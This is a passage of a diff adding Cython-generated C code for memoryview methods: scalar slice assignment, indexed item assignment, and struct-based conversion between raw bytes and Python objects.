__Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.setitem_slice_assignment", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":453 + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) + * + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): # <<<<<<<<<<<<<< + * cdef int array[128] + * cdef void *tmp = NULL + */ + +static PyObject *__pyx_memoryview_setitem_slice_assign_scalar(struct __pyx_memoryview_obj *__pyx_v_self, struct __pyx_memoryview_obj *__pyx_v_dst, PyObject *__pyx_v_value) { + int __pyx_v_array[0x80]; + void *__pyx_v_tmp; + void *__pyx_v_item; + __Pyx_memviewslice *__pyx_v_dst_slice; + __Pyx_memviewslice __pyx_v_tmp_slice; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_memviewslice *__pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_t_5; + char const *__pyx_t_6; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + PyObject *__pyx_t_9 = NULL; + PyObject *__pyx_t_10 = NULL; + PyObject *__pyx_t_11 = NULL; + PyObject *__pyx_t_12 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("setitem_slice_assign_scalar", 0); + + /* "View.MemoryView":455 + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): + * cdef int array[128] + * cdef void *tmp = NULL # <<<<<<<<<<<<<< + * cdef void *item + * + */ + __pyx_v_tmp = NULL; + + /* "View.MemoryView":460 + * cdef __Pyx_memviewslice *dst_slice + * cdef __Pyx_memviewslice tmp_slice + * dst_slice = get_slice_from_memview(dst, &tmp_slice) # <<<<<<<<<<<<<< + * + * if self.view.itemsize > sizeof(array): + */ + __pyx_t_1 = __pyx_memoryview_get_slice_from_memoryview(__pyx_v_dst, (&__pyx_v_tmp_slice)); if (unlikely(__pyx_t_1 == ((__Pyx_memviewslice *)NULL))) __PYX_ERR(1, 460, __pyx_L1_error) + __pyx_v_dst_slice = __pyx_t_1; + + /* "View.MemoryView":462 + * dst_slice = get_slice_from_memview(dst, &tmp_slice) + * + * if self.view.itemsize > sizeof(array): # <<<<<<<<<<<<<< + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: + */ + __pyx_t_2 = (((size_t)__pyx_v_self->view.itemsize) > (sizeof(__pyx_v_array))); + if (__pyx_t_2) { + + /* "View.MemoryView":463 + * + * if self.view.itemsize > sizeof(array): + * tmp = PyMem_Malloc(self.view.itemsize) # <<<<<<<<<<<<<< + * if tmp == NULL: + * raise MemoryError + */ + __pyx_v_tmp = PyMem_Malloc(__pyx_v_self->view.itemsize); + + /* "View.MemoryView":464 + * if self.view.itemsize > sizeof(array): + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * item = tmp + */ + __pyx_t_2 = (__pyx_v_tmp == NULL); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":465 + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: + * raise MemoryError # <<<<<<<<<<<<<< + * item = tmp + * else: + */ + PyErr_NoMemory(); __PYX_ERR(1, 465, __pyx_L1_error) + + /* "View.MemoryView":464 + * if self.view.itemsize > sizeof(array): + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: # <<<<<<<<<<<<<< + * raise MemoryError + * item = tmp + */ + } + + /* "View.MemoryView":466 + * if tmp == NULL: + * raise MemoryError + * item = tmp # <<<<<<<<<<<<<< + * else: + * item = array + */ + __pyx_v_item = __pyx_v_tmp; + + /* "View.MemoryView":462 + * dst_slice = get_slice_from_memview(dst, &tmp_slice) + * + * if self.view.itemsize > sizeof(array): # <<<<<<<<<<<<<< + * tmp = PyMem_Malloc(self.view.itemsize) + * if tmp == NULL: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":468 + * item = tmp + * else: + * item = array # <<<<<<<<<<<<<< + * + * try: + */ + /*else*/ { + __pyx_v_item = ((void *)__pyx_v_array); + } + __pyx_L3:; + + /* "View.MemoryView":470 + * item = array + * + * try: # <<<<<<<<<<<<<< + * if self.dtype_is_object: + * ( item)[0] = value + */ + /*try:*/ { + + /* "View.MemoryView":471 + * + * try: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * ( item)[0] = value + * else: + */ + if (__pyx_v_self->dtype_is_object) { + + /* "View.MemoryView":472 + * try: + * if self.dtype_is_object: + * ( item)[0] = value # <<<<<<<<<<<<<< + * else: + * self.assign_item_from_object( item, value) + */ + (((PyObject **)__pyx_v_item)[0]) = ((PyObject *)__pyx_v_value); + + /* "View.MemoryView":471 + * + * try: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * ( item)[0] = value + * else: + */ + goto __pyx_L8; + } + + /* "View.MemoryView":474 + * ( item)[0] = value + * else: + * self.assign_item_from_object( item, value) # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __pyx_t_3 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->assign_item_from_object(__pyx_v_self, ((char *)__pyx_v_item), __pyx_v_value); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 474, __pyx_L6_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_L8:; + + /* "View.MemoryView":478 + * + * + * if self.view.suboffsets != NULL: # <<<<<<<<<<<<<< + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, + */ + __pyx_t_2 = (__pyx_v_self->view.suboffsets != NULL); + if (__pyx_t_2) { + + /* "View.MemoryView":479 + * + * if self.view.suboffsets != NULL: + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) # <<<<<<<<<<<<<< + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, + * item, self.dtype_is_object) + */ + __pyx_t_4 = assert_direct_dimensions(__pyx_v_self->view.suboffsets, __pyx_v_self->view.ndim); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(1, 479, __pyx_L6_error) + + /* "View.MemoryView":478 + * + * + * if self.view.suboffsets != NULL: # <<<<<<<<<<<<<< + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, + */ + } + + /* "View.MemoryView":480 + * if self.view.suboffsets != NULL: + * assert_direct_dimensions(self.view.suboffsets, self.view.ndim) + * slice_assign_scalar(dst_slice, dst.view.ndim, self.view.itemsize, # <<<<<<<<<<<<<< + * item, self.dtype_is_object) + * finally: + */ + __pyx_memoryview_slice_assign_scalar(__pyx_v_dst_slice, __pyx_v_dst->view.ndim, __pyx_v_self->view.itemsize, __pyx_v_item, __pyx_v_self->dtype_is_object); + } + + /* "View.MemoryView":483 + * item, self.dtype_is_object) + * finally: + * PyMem_Free(tmp) # <<<<<<<<<<<<<< + * + * cdef setitem_indexed(self, index, value): + */ + /*finally:*/ { + /*normal exit:*/{ + PyMem_Free(__pyx_v_tmp); + goto __pyx_L7; + } + __pyx_L6_error:; + /*exception exit:*/{ + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __pyx_t_7 = 0; __pyx_t_8 = 0; __pyx_t_9 = 0; __pyx_t_10 = 0; __pyx_t_11 = 0; __pyx_t_12 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (PY_MAJOR_VERSION >= 3) __Pyx_ExceptionSwap(&__pyx_t_10, &__pyx_t_11, &__pyx_t_12); + if ((PY_MAJOR_VERSION < 3) || unlikely(__Pyx_GetException(&__pyx_t_7, &__pyx_t_8, &__pyx_t_9) < 0)) __Pyx_ErrFetch(&__pyx_t_7, &__pyx_t_8, &__pyx_t_9); + __Pyx_XGOTREF(__pyx_t_7); + __Pyx_XGOTREF(__pyx_t_8); + __Pyx_XGOTREF(__pyx_t_9); + __Pyx_XGOTREF(__pyx_t_10); + __Pyx_XGOTREF(__pyx_t_11); + __Pyx_XGOTREF(__pyx_t_12); + __pyx_t_4 = __pyx_lineno; __pyx_t_5 = __pyx_clineno; __pyx_t_6 = __pyx_filename; + { + PyMem_Free(__pyx_v_tmp); + } + if (PY_MAJOR_VERSION >= 3) { + __Pyx_XGIVEREF(__pyx_t_10); + __Pyx_XGIVEREF(__pyx_t_11); + __Pyx_XGIVEREF(__pyx_t_12); + __Pyx_ExceptionReset(__pyx_t_10, __pyx_t_11, __pyx_t_12); + } + __Pyx_XGIVEREF(__pyx_t_7); + __Pyx_XGIVEREF(__pyx_t_8); + __Pyx_XGIVEREF(__pyx_t_9); + __Pyx_ErrRestore(__pyx_t_7, __pyx_t_8, __pyx_t_9); + __pyx_t_7 = 0; __pyx_t_8 = 0; __pyx_t_9 = 0; __pyx_t_10 = 0; __pyx_t_11 = 0; __pyx_t_12 = 0; + __pyx_lineno = __pyx_t_4; __pyx_clineno = __pyx_t_5; __pyx_filename = __pyx_t_6; + goto __pyx_L1_error; + } + __pyx_L7:; + } + + /* "View.MemoryView":453 + * memoryview_copy_contents(msrc, mdst, src.ndim, dst.ndim, self.dtype_is_object) + * + * cdef setitem_slice_assign_scalar(self, memoryview dst, value): # <<<<<<<<<<<<<< + * cdef int array[128] + * cdef void *tmp = NULL + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.setitem_slice_assign_scalar", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":485 + * PyMem_Free(tmp) + * + * cdef setitem_indexed(self, index, value): # <<<<<<<<<<<<<< + * cdef char *itemp = self.get_item_pointer(index) + * self.assign_item_from_object(itemp, value) + */ + +static PyObject *__pyx_memoryview_setitem_indexed(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value) { + char *__pyx_v_itemp; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + char *__pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("setitem_indexed", 0); + + /* "View.MemoryView":486 + * + * cdef setitem_indexed(self, index, value): + * cdef char *itemp = self.get_item_pointer(index) # <<<<<<<<<<<<<< + * self.assign_item_from_object(itemp, value) + * + */ + __pyx_t_1 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->get_item_pointer(__pyx_v_self, __pyx_v_index); if (unlikely(__pyx_t_1 == ((char *)NULL))) __PYX_ERR(1, 486, __pyx_L1_error) + __pyx_v_itemp = __pyx_t_1; + + /* "View.MemoryView":487 + * cdef setitem_indexed(self, index, value): + * cdef char *itemp = self.get_item_pointer(index) + * self.assign_item_from_object(itemp, value) # <<<<<<<<<<<<<< + * + * cdef convert_item_to_object(self, char *itemp): + */ + __pyx_t_2 = ((struct __pyx_vtabstruct_memoryview *)__pyx_v_self->__pyx_vtab)->assign_item_from_object(__pyx_v_self, __pyx_v_itemp, __pyx_v_value); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 487, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":485 + * PyMem_Free(tmp) + * + * cdef setitem_indexed(self, index, value): # <<<<<<<<<<<<<< + * cdef char *itemp = self.get_item_pointer(index) + * self.assign_item_from_object(itemp, value) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.memoryview.setitem_indexed", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":489 + * self.assign_item_from_object(itemp, value) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + +static PyObject *__pyx_memoryview_convert_item_to_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp) { + PyObject *__pyx_v_struct = NULL; + PyObject *__pyx_v_bytesitem = 0; + PyObject *__pyx_v_result = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + Py_ssize_t __pyx_t_9; + int __pyx_t_10; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("convert_item_to_object", 0); + + /* "View.MemoryView":492 + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + * import struct # <<<<<<<<<<<<<< + * cdef bytes bytesitem + * + */ + __pyx_t_1 = __Pyx_ImportDottedModule(__pyx_n_s_struct, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 492, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_struct = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":495 + * cdef bytes bytesitem + * + * bytesitem = itemp[:self.view.itemsize] # <<<<<<<<<<<<<< + * try: + * result = struct.unpack(self.view.format, bytesitem) + */ + __pyx_t_1 = __Pyx_PyBytes_FromStringAndSize(__pyx_v_itemp + 0, __pyx_v_self->view.itemsize - 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 495, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_bytesitem = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":496 + * + * bytesitem = itemp[:self.view.itemsize] + * try: # <<<<<<<<<<<<<< + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_2, &__pyx_t_3, &__pyx_t_4); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_4); + /*try:*/ { + + /* "View.MemoryView":497 + * bytesitem = itemp[:self.view.itemsize] + * try: + * result = struct.unpack(self.view.format, bytesitem) # <<<<<<<<<<<<<< + * except struct.error: + * raise ValueError, "Unable to convert item to object" + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_unpack); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 497, __pyx_L3_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_PyBytes_FromString(__pyx_v_self->view.format); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 497, __pyx_L3_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_7, __pyx_t_6, __pyx_v_bytesitem}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_8, 2+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 497, __pyx_L3_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_v_result = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":496 + * + * bytesitem = itemp[:self.view.itemsize] + * try: # <<<<<<<<<<<<<< + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + */ + } + + /* "View.MemoryView":501 + * raise ValueError, "Unable to convert item to object" + * else: + * if len(self.view.format) == 1: # <<<<<<<<<<<<<< + * return result[0] + * return result + */ + /*else:*/ { + __pyx_t_9 = __Pyx_ssize_strlen(__pyx_v_self->view.format); if (unlikely(__pyx_t_9 == ((Py_ssize_t)-1))) __PYX_ERR(1, 501, __pyx_L5_except_error) + __pyx_t_10 = (__pyx_t_9 == 1); + if (__pyx_t_10) { + + /* "View.MemoryView":502 + * else: + * if len(self.view.format) == 1: + * return result[0] # <<<<<<<<<<<<<< + * return result + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_result, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 502, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L6_except_return; + + /* "View.MemoryView":501 + * raise ValueError, "Unable to convert item to object" + * else: + * if len(self.view.format) == 1: # <<<<<<<<<<<<<< + * return result[0] + * return result + */ + } + + /* "View.MemoryView":503 + * if len(self.view.format) == 1: + * return result[0] + * return result # <<<<<<<<<<<<<< + * + * cdef assign_item_from_object(self, char *itemp, object value): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_result); + __pyx_r = __pyx_v_result; + goto __pyx_L6_except_return; + } + __pyx_L3_error:; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "View.MemoryView":498 + * try: + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: # <<<<<<<<<<<<<< + * raise ValueError, "Unable to convert item to object" + * else: + */ + __Pyx_ErrFetch(&__pyx_t_1, &__pyx_t_5, &__pyx_t_6); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_error); if (unlikely(!__pyx_t_7)) __PYX_ERR(1, 498, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = __Pyx_PyErr_GivenExceptionMatches(__pyx_t_1, __pyx_t_7); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_ErrRestore(__pyx_t_1, __pyx_t_5, __pyx_t_6); + __pyx_t_1 = 0; __pyx_t_5 = 0; __pyx_t_6 = 0; + if (__pyx_t_8) { + __Pyx_AddTraceback("View.MemoryView.memoryview.convert_item_to_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_6, &__pyx_t_5, &__pyx_t_1) < 0) __PYX_ERR(1, 498, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_1); + + /* "View.MemoryView":499 + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + * raise ValueError, "Unable to convert item to object" # <<<<<<<<<<<<<< + * else: + * if len(self.view.format) == 1: + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Unable_to_convert_item_to_object, 0, 0); + __PYX_ERR(1, 499, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "View.MemoryView":496 + * + * bytesitem = itemp[:self.view.itemsize] + * try: # <<<<<<<<<<<<<< + * result = struct.unpack(self.view.format, bytesitem) + * except struct.error: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_ExceptionReset(__pyx_t_2, __pyx_t_3, __pyx_t_4); + goto __pyx_L1_error; + __pyx_L6_except_return:; + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_XGIVEREF(__pyx_t_4); + __Pyx_ExceptionReset(__pyx_t_2, __pyx_t_3, __pyx_t_4); + goto __pyx_L0; + } + + /* "View.MemoryView":489 + * self.assign_item_from_object(itemp, value) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("View.MemoryView.memoryview.convert_item_to_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_struct); + __Pyx_XDECREF(__pyx_v_bytesitem); + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":505 + * return result + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + */ + +static PyObject *__pyx_memoryview_assign_item_from_object(struct __pyx_memoryview_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value) { + PyObject *__pyx_v_struct = NULL; + char __pyx_v_c; + PyObject *__pyx_v_bytesvalue = 0; + Py_ssize_t __pyx_v_i; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + Py_ssize_t __pyx_t_7; + PyObject *__pyx_t_8 = NULL; + char *__pyx_t_9; + char *__pyx_t_10; + char *__pyx_t_11; + char *__pyx_t_12; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("assign_item_from_object", 0); + + /* "View.MemoryView":508 + * """Only used if instantiated manually by the user, or if Cython doesn't + * know how to convert the type""" + * import struct # <<<<<<<<<<<<<< + * cdef char c + * cdef bytes bytesvalue + */ + __pyx_t_1 = __Pyx_ImportDottedModule(__pyx_n_s_struct, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 508, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_struct = __pyx_t_1; + __pyx_t_1 = 0; + + /* "View.MemoryView":513 + * cdef Py_ssize_t i + * + * if isinstance(value, tuple): # <<<<<<<<<<<<<< + * bytesvalue = struct.pack(self.view.format, *value) + * else: + */ + __pyx_t_2 = PyTuple_Check(__pyx_v_value); + if (__pyx_t_2) { + + /* "View.MemoryView":514 + * + * if isinstance(value, tuple): + * bytesvalue = struct.pack(self.view.format, *value) # <<<<<<<<<<<<<< + * else: + * bytesvalue = struct.pack(self.view.format, value) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_pack); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyBytes_FromString(__pyx_v_self->view.format); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_3); + __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_value); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = PyNumber_Add(__pyx_t_4, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_5, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 514, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (!(likely(PyBytes_CheckExact(__pyx_t_3))||((__pyx_t_3) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_t_3))) __PYX_ERR(1, 514, __pyx_L1_error) + __pyx_v_bytesvalue = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":513 + * cdef Py_ssize_t i + * + * if isinstance(value, tuple): # <<<<<<<<<<<<<< + * bytesvalue = struct.pack(self.view.format, *value) + * else: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":516 + * bytesvalue = struct.pack(self.view.format, *value) + * else: + * bytesvalue = struct.pack(self.view.format, value) # <<<<<<<<<<<<<< + * + * for i, c in enumerate(bytesvalue): + */ + /*else*/ { + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_struct, __pyx_n_s_pack); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = __Pyx_PyBytes_FromString(__pyx_v_self->view.format); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_4, __pyx_t_1, __pyx_v_value}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 516, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + if (!(likely(PyBytes_CheckExact(__pyx_t_3))||((__pyx_t_3) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_t_3))) __PYX_ERR(1, 516, __pyx_L1_error) + __pyx_v_bytesvalue = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + } + __pyx_L3:; + + /* "View.MemoryView":518 + * bytesvalue = struct.pack(self.view.format, value) + * + * for i, c in enumerate(bytesvalue): # <<<<<<<<<<<<<< + * itemp[i] = c + * + */ + __pyx_t_7 = 0; + if (unlikely(__pyx_v_bytesvalue == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' is not iterable"); + __PYX_ERR(1, 518, __pyx_L1_error) + } + __Pyx_INCREF(__pyx_v_bytesvalue); + __pyx_t_8 = __pyx_v_bytesvalue; + __pyx_t_10 = PyBytes_AS_STRING(__pyx_t_8); + __pyx_t_11 = (__pyx_t_10 + PyBytes_GET_SIZE(__pyx_t_8)); + for (__pyx_t_12 = __pyx_t_10; __pyx_t_12 < __pyx_t_11; __pyx_t_12++) { + __pyx_t_9 = __pyx_t_12; + __pyx_v_c = (__pyx_t_9[0]); + + /* "View.MemoryView":519 + * + * for i, c in enumerate(bytesvalue): + * itemp[i] = c # <<<<<<<<<<<<<< + * + * @cname('getbuffer') + */ + __pyx_v_i = __pyx_t_7; + + /* "View.MemoryView":518 + * bytesvalue = struct.pack(self.view.format, value) + * + * for i, c in enumerate(bytesvalue): # <<<<<<<<<<<<<< + * itemp[i] = c + * + */ + __pyx_t_7 = (__pyx_t_7 + 1); + + /* "View.MemoryView":519 + * + * for i, c in enumerate(bytesvalue): + * itemp[i] = c # <<<<<<<<<<<<<< + * + * @cname('getbuffer') + */ + (__pyx_v_itemp[__pyx_v_i]) = __pyx_v_c; + } + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + + /* 